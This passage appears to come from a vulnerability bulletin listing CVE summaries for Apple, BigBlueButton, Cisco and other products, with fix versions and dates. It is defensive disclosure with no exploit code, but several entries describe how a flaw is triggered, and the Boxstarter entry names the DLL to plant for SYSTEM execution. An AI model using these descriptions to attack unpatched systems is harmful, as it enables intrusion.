An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9984
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9937
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9879
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9882
MISC
MISC
MISC
apple — multiple_products
 
A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A malicious mail server may overwrite arbitrary mail files. 2020-10-22 not yet calculated CVE-2020-9920
MISC
MISC
MISC
apple — multiple_products
 
A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2020-10-22 not yet calculated CVE-2020-9906
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9877
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
This issue was addressed with improved entitlements. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A sandboxed process may be able to circumvent sandbox restrictions. 2020-10-22 not yet calculated CVE-2020-9898
MISC
MISC
apple — multiple_products
 
A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A remote attacker may be able to cause a denial of service. 2020-10-22 not yet calculated CVE-2020-9905
MISC
MISC
MISC
apple — multiple_products
 
A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9904
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9876
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9919
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9874
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A sandboxed process may be able to circumvent sandbox restrictions. 2020-10-22 not yet calculated CVE-2020-9772
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9940
MISC
MISC
MISC
apple — multiple_products
 
An integer overflow was addressed through improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9875
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An access issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, macOS Catalina 10.15.4, tvOS 13.4, watchOS 6.2. A local user may be able to view sensitive user information. 2020-10-22 not yet calculated CVE-2020-3918
MISC
MISC
MISC
MISC
apple — multiple_products
 
An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A local attacker may be able to elevate their privileges. 2020-10-22 not yet calculated CVE-2020-9901
MISC
MISC
MISC
apple — multiple_products
 
A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to overwrite arbitrary files. 2020-10-22 not yet calculated CVE-2020-9994
MISC
MISC
MISC
MISC
apple — multiple_products
 
A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9985
MISC
MISC
MISC
apple — multiple_products
 
A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges. 2020-10-22 not yet calculated CVE-2020-9863
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9871
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted font file may lead to arbitrary code execution. 2020-10-22 not yet calculated CVE-2020-9980
MISC
MISC
MISC
MISC
aptean — product_configurator
 
An issue was discovered in Aptean Product Configurator 4.61.0000 on Windows. A Time based SQL injection affects the nameTxt parameter on the main login page (aka cse?cmd=LOGIN). This can be exploited directly, and remotely. 2020-10-16 not yet calculated CVE-2020-26944
MISC
MISC
arista — eos
 
Arista EOS before 4.21.12M, 4.22.x before 4.22.7M, 4.23.x before 4.23.5M, and 4.24.x before 4.24.2F allows remote attackers to cause a denial of service (restart of agents) by crafting a malformed DHCP packet which leads to an incorrect route being installed. 2020-10-21 not yet calculated CVE-2020-17355
CONFIRM
atmel — advanced_software_framework
 
Atmel Advanced Software Framework (ASF) 4 has an Integer Overflow. 2020-10-22 not yet calculated CVE-2019-16127
MISC
MISC
MLIST
atomxcms — atomxcms
 
AtomXCMS 2.0 is affected by Incorrect Access Control via admin/dump.php 2020-10-22 not yet calculated CVE-2020-26649
MISC
atomxcms — atomxcms
 
AtomXCMS 2.0 is affected by Arbitrary File Read via admin/dump.php 2020-10-22 not yet calculated CVE-2020-26650
MISC
bass — audio_library

 

The BASSMIDI plugin 2.4.12.1 for Un4seen BASS Audio Library on Windows is prone to an out of bounds write vulnerability. An attacker may exploit this to execute code on the target machine. A failure in exploitation leads to a denial of service. 2020-10-16 not yet calculated CVE-2019-19513
MISC
MISC
bass — audio_library

 

The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Denial of Service vulnerability (infinite loop) via a crafted .mp3 file. This weakness could allow attackers to consume excessive CPU and the application becomes unresponsive. 2020-10-16 not yet calculated CVE-2019-18796
MISC
MISC
bass — audio_library
 
The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Use after Free vulnerability via a crafted .ogg file. An attacker can exploit this to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service. 2020-10-16 not yet calculated CVE-2019-18794
MISC
MISC
bass — audio_library
 
The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile out of bounds read vulnerability via a crafted .wav file. An attacker can exploit this issues to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service. 2020-10-16 not yet calculated CVE-2019-18795
MISC
MISC
belkin — linksys_wrt160nl
 
** UNSUPPORTED WHEN ASSIGNED ** Belkin LINKSYS WRT160NL 1.0.04.002_US_20130619 devices have a stack-based buffer overflow vulnerability because of sprintf in create_dir in mini_httpd. Successful exploitation leads to arbitrary code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. 2020-10-23 not yet calculated CVE-2020-26561
MISC
bender — multiple_devices
 
In Bender COMTRAXX, user authorization is validated for most, but not all, routes in the system. A user with knowledge about the routes can read and write configuration data without prior authorization. This affects COM465IP, COM465DP, COM465ID, CP700, CP907, and CP915 devices before 4.2.0. 2020-10-16 not yet calculated CVE-2019-19885
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.2.28 (or earlier) does not set the secure flag for the session cookie in an https session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an http session. 2020-10-21 not yet calculated CVE-2020-27606
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.2.27 has an unsafe JODConverter setting in which LibreOffice document conversions can access external files. 2020-10-21 not yet calculated CVE-2020-27603
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton through 2.2.28 uses Ghostscript for processing of uploaded EPS documents, and consequently may be subject to attacks related to a “schwache Sandbox.” 2020-10-21 not yet calculated CVE-2020-27605
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.3 does not implement LibreOffice sandboxing. This might make it easier for remote authenticated users to read the API shared secret in the bigbluebutton.properties file. With the API shared secret, an attacker can (for example) use api/join to join an arbitrary meeting regardless of its guestPolicy setting. 2020-10-21 not yet calculated CVE-2020-27604
MISC
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton before 2.2.7 allows remote authenticated users to read local files and conduct SSRF attacks via an uploaded Office document that has a crafted URL in an ODF xlink field. 2020-10-21 not yet calculated CVE-2020-25820
MISC
MISC
MISC
MISC
MISC
bigbluebutton — bigbluebutton
 
In BigBlueButton before 2.2.28 (or earlier), the client-side Mute button only signifies that the server should stop accepting audio data from the client. It does not directly configure the client to stop sending audio data to the server, and thus a modified server could store the audio data and/or transmit it to one or more meeting participants or other third parties. 2020-10-21 not yet calculated CVE-2020-27607
MISC
bigbluebutton — bigbluebutton
 
In BigBlueButton before 2.2.28 (or earlier), uploaded presentations are sent to clients without a Content-Type header, which allows XSS, as demonstrated by a .png file extension for an HTML document. 2020-10-21 not yet calculated CVE-2020-27608
MISC
bigbluebutton — bigbluebutton
 
The installation procedure in BigBlueButton before 2.2.28 (or earlier) exposes certain network services to external interfaces, and does not automatically set up a firewall configuration to block external access. 2020-10-21 not yet calculated CVE-2020-27610
MISC
bigbluebutton — bigbluebutton
 
The installation procedure in BigBlueButton before 2.2.28 (or earlier) uses ClueCon as the FreeSWITCH password, which allows local users to achieve unintended FreeSWITCH access. 2020-10-21 not yet calculated CVE-2020-27613
MISC
bigbluebutton — bigbluebutton
 
Greenlight in BigBlueButton through 2.2.28 places usernames in room URLs, which may represent an unintended information leak to users in a room, or an information leak to outsiders if any user publishes a screenshot of a browser window. 2020-10-21 not yet calculated CVE-2020-27612
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton through 2.2.28 uses STUN/TURN resources from a third party, which may represent an unintended endpoint. 2020-10-21 not yet calculated CVE-2020-27611
MISC
bigbluebutton — bigbluebutton
 
BigBlueButton through 2.2.28 records a video meeting despite the deactivation of video recording in the user interface. This may result in data storage beyond what is authorized for a specific meeting topic or participant. 2020-10-21 not yet calculated CVE-2020-27609
MISC
MISC
bigbluebutton — bigbluebutton
 
A cross-site scripting (XSS) vulnerability exists in the ‘merge account’ functionality in admins.js in BigBlueButton Greenlight 2.7.6. 2020-10-22 not yet calculated CVE-2020-27642
MISC
biscom — secure_file_transfer
 
Biscom Secure File Transfer (SFT) before 5.1.1082 and 6.x before 6.0.1011 allows user credential theft. 2020-10-22 not yet calculated CVE-2020-27646
MISC
blinger.io — blinger.io
 
Blinger.io v.1.0.2519 is vulnerable to Blind/Persistent XSS. An attacker can send arbitrary JavaScript code via a built-in communication channel, such as Telegram, WhatsApp, Viber, Skype, Facebook, Vkontakte, or Odnoklassniki. This is mishandled within the administration panel for conversations/all, conversations/inbox, conversations/unassigned, and conversations/closed. 2020-10-19 not yet calculated CVE-2019-13633
MISC
MISC
boxstarter — boxstarter
 
The Boxstarter installer before version 2.13.0 configures C:ProgramDataBoxstarter to be in the system-wide PATH environment variable. However, this directory is writable by normal, unprivileged users. To exploit the vulnerability, place a DLL in this directory that a privileged service is looking for. For example, WptsExtensions.dll When Windows starts, it’ll execute the code in DllMain() with SYSTEM privileges. Any unprivileged user can execute code with SYSTEM privileges. The issue is fixed in version 3.13.0 2020-10-20 not yet calculated CVE-2020-15264
MISC
CONFIRM
CERT-VN
cisco — adapative_security_appliance_and_firepwoer_threat_defense_software
 
A vulnerability in the SSL/TLS session handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory leak when closing SSL/TLS connections in a specific state. An attacker could exploit this vulnerability by establishing several SSL/TLS sessions and ensuring they are closed under certain conditions. A successful exploit could allow the attacker to exhaust memory resources in the affected device, which would prevent it from processing new SSL/TLS connections, resulting in a DoS. Manual intervention is required to recover an affected device. 2020-10-21 not yet calculated CVE-2020-3572
CISCO
cisco — adaptive_security_appliance_and_cisco_firepower_threat_defense_software
 
A vulnerability in the FTP inspection engine of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass FTP inspection. The vulnerability is due to ineffective flow tracking of FTP traffic. An attacker could exploit this vulnerability by sending crafted FTP traffic through an affected device. A successful exploit could allow the attacker to bypass FTP inspection and successfully complete FTP connections. 2020-10-21 not yet calculated CVE-2020-3564
CISCO
cisco — adaptive_security_appliance_and_cisco_firepower_threat_defense_software
 
A vulnerability in the Clientless SSL VPN (WebVPN) of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to inject arbitrary HTTP headers in the responses of the affected system. The vulnerability is due to improper input sanitization. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to conduct a CRLF injection attack, adding arbitrary HTTP headers in the responses of the system and redirecting the user to arbitrary websites. 2020-10-21 not yet calculated CVE-2020-3561
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense)software
 
A vulnerability in the SIP inspection process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a crash and reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to a watchdog timeout and crash during the cleanup of threads that are associated with a SIP connection that is being deleted from the connection list. An attacker could exploit this vulnerability by sending a high rate of crafted SIP traffic through an affected device. A successful exploit could allow the attacker to cause a watchdog timeout and crash, resulting in a crash and reload of the affected device. 2020-10-21 not yet calculated CVE-2020-3555
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3581
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3583
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3580
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access rule and access parts of the WebVPN portal that are supposed to be blocked. The vulnerability is due to insufficient validation of URLs when portal access rules are configured. An attacker could exploit this vulnerability by accessing certain URLs on the affected device. 2020-10-21 not yet calculated CVE-2020-3578
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the TLS handler of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 1000 Series firewalls could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper implementation of countermeasures against the Bleichenbacher attack for cipher suites that rely on RSA for key exchange. An attacker could exploit this vulnerability by sending crafted TLS messages to the device, which would act as an oracle and allow the attacker to carry out a chosen-ciphertext attack. A successful exploit could allow the attacker to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions to the affected device. To exploit this vulnerability, an attacker must be able to perform both of the following actions: Capture TLS traffic that is in transit between clients and the affected device Actively establish a considerable number of TLS connections to the affected device 2020-10-21 not yet calculated CVE-2020-3585
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the TCP packet processing of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory exhaustion condition. An attacker could exploit this vulnerability by sending a high rate of crafted TCP traffic through an affected device. A successful exploit could allow the attacker to exhaust device resources, resulting in a DoS condition for traffic transiting the affected device. 2020-10-21 not yet calculated CVE-2020-3554
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. 2020-10-21 not yet calculated CVE-2020-3582
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the IP fragment-handling implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a memory leak on an affected device. This memory leak could prevent traffic from being processed through the device, resulting in a denial of service (DoS) condition. The vulnerability is due to improper error handling when specific failures occur during IP fragment reassembly. An attacker could exploit this vulnerability by sending crafted, fragmented IP traffic to a targeted device. A successful exploit could allow the attacker to continuously consume memory on the affected device and eventually impact traffic, resulting in a DoS condition. The device could require a manual reboot to recover from the DoS condition. Note: This vulnerability applies to both IP Version 4 (IPv4) and IP Version 6 (IPv6) traffic. 2020-10-21 not yet calculated CVE-2020-3373
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the OSPF Version 2 (OSPFv2) implementation of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to incomplete input validation when the affected software processes certain OSPFv2 packets with Link-Local Signaling (LLS) data. An attacker could exploit this vulnerability by sending a malformed OSPFv2 packet to an affected device. A successful exploit could allow the attacker to cause an affected device to reload, resulting in a DoS condition. 2020-10-21 not yet calculated CVE-2020-3528
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
Multiple vulnerabilities in the secure boot process of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software for the Firepower 1000 Series and Firepower 2100 Series Appliances could allow an authenticated, local attacker to bypass the secure boot mechanism. The vulnerabilities are due to insufficient protections of the secure boot process. An attacker could exploit these vulnerabilities by injecting code into specific files that are then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device, which would be executed at each boot and maintain persistence across reboots. 2020-10-21 not yet calculated CVE-2020-3458
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to upload arbitrary-sized files to specific folders on an affected device, which could lead to an unexpected device reload. The vulnerability exists because the affected software does not efficiently handle the writing of large files to specific folders on the local file system. An attacker could exploit this vulnerability by uploading files to those specific folders. A successful exploit could allow the attacker to write a file that triggers a watchdog timeout, which would cause the device to unexpectedly reload, causing a denial of service (DoS) condition. 2020-10-21 not yet calculated CVE-2020-3436
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the web interface of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition. Note: This vulnerability applies to IP Version 4 (IPv4) and IP Version 6 (IPv6) HTTP traffic. 2020-10-21 not yet calculated CVE-2020-3304
CISCO
cisco — adaptive_security_appliance_and_firepower_threat_defense_software
 
A vulnerability in the SSL VPN negotiation process for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to inefficient direct memory access (DMA) memory management during the negotiation phase of an SSL VPN connection. An attacker could exploit this vulnerability by sending a steady stream of crafted Datagram TLS (DTLS) traffic to an affected device. A successful exploit could allow the attacker to exhaust DMA memory on the device and cause a DoS condition. 2020-10-21 not yet calculated CVE-2020-3529
CISCO
cisco — adaptive_security_appliance_software
 
A vulnerability in the web-based management interface of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-10-21 not yet calculated CVE-2020-3599
CISCO
cisco — firepower_chassis_manager
 
A vulnerability in the Cisco Firepower Chassis Manager (FCM) of Cisco FXOS Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of an affected device. The vulnerability is due to insufficient CSRF protections for the FCM interface. An attacker could exploit this vulnerability by persuading a targeted user to click a malicious link. A successful exploit could allow the attacker to send arbitrary requests that could take unauthorized actions on behalf of the targeted user. 2020-10-21 not yet calculated CVE-2020-3456
CISCO
cisco — firepower_management_center
 
A vulnerability in the Common Access Card (CAC) authentication feature of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and access the FMC system. The attacker must have a valid CAC to initiate the access attempt. The vulnerability is due to incorrect session invalidation during CAC authentication. An attacker could exploit this vulnerability by performing a CAC-based authentication attempt to an affected system. A successful exploit could allow the attacker to access an affected system with the privileges of a CAC-authenticated user who is currently logged in. 2020-10-21 not yet calculated CVE-2020-3410
CISCO
cisco — firepower_management_center_and_firepower_threat_defense_software
 
A vulnerability in the sfmgr daemon of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, remote attacker to perform directory traversal and access directories outside the restricted path. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by using a relative path in specific sfmgr commands. An exploit could allow the attacker to read or write arbitrary files on an sftunnel-connected peer device. 2020-10-21 not yet calculated CVE-2020-3550
CISCO
cisco — firepower_management_center_and_firepower_threat_defense_software
 
A vulnerability in the sftunnel functionality of Cisco Firepower Management Center (FMC) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to obtain the device registration hash. The vulnerability is due to insufficient sftunnel negotiation protection during initial device registration. An attacker in a man-in-the-middle position could exploit this vulnerability by intercepting a specific flow of the sftunnel communication between an FMC device and an FTD device. A successful exploit could allow the attacker to decrypt and modify the sftunnel communication between FMC and FTD devices, allowing the attacker to modify configuration data sent from an FMC device to an FTD device or alert data sent from an FTD device to an FMC device. 2020-10-21 not yet calculated CVE-2020-3549
CISCO
cisco — firepower_management_center_software
 
A vulnerability in the host input API daemon of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper certificate validation. An attacker could exploit this vulnerability by sending a crafted data stream to the host input daemon of the affected device. A successful exploit could allow the attacker to cause the host input daemon to restart. The attacker could use repeated attacks to cause the daemon to continuously reload, creating a DoS condition for the API. 2020-10-21 not yet calculated CVE-2020-3557
CISCO
cisco — firepower_management_center_software
 
A vulnerability in the licensing service of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.The vulnerability is due to improper handling of system resource values by the affected system. An attacker could exploit this vulnerability by sending malicious requests to the targeted system. A successful exploit could allow the attacker to cause the affected system to become unresponsive, resulting in a DoS condition and preventing the management of dependent devices. 2020-10-21 not yet calculated CVE-2020-3499
CISCO
cisco — firepower_management_center_software
 
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-10-21 not yet calculated CVE-2020-3553
CISCO
cisco — firepower_management_center_software
 
Multiple vulnerabilities in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. These vulnerabilities are due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-10-21 not yet calculated CVE-2020-3515
CISCO
cisco — firepower_management_center_software
 
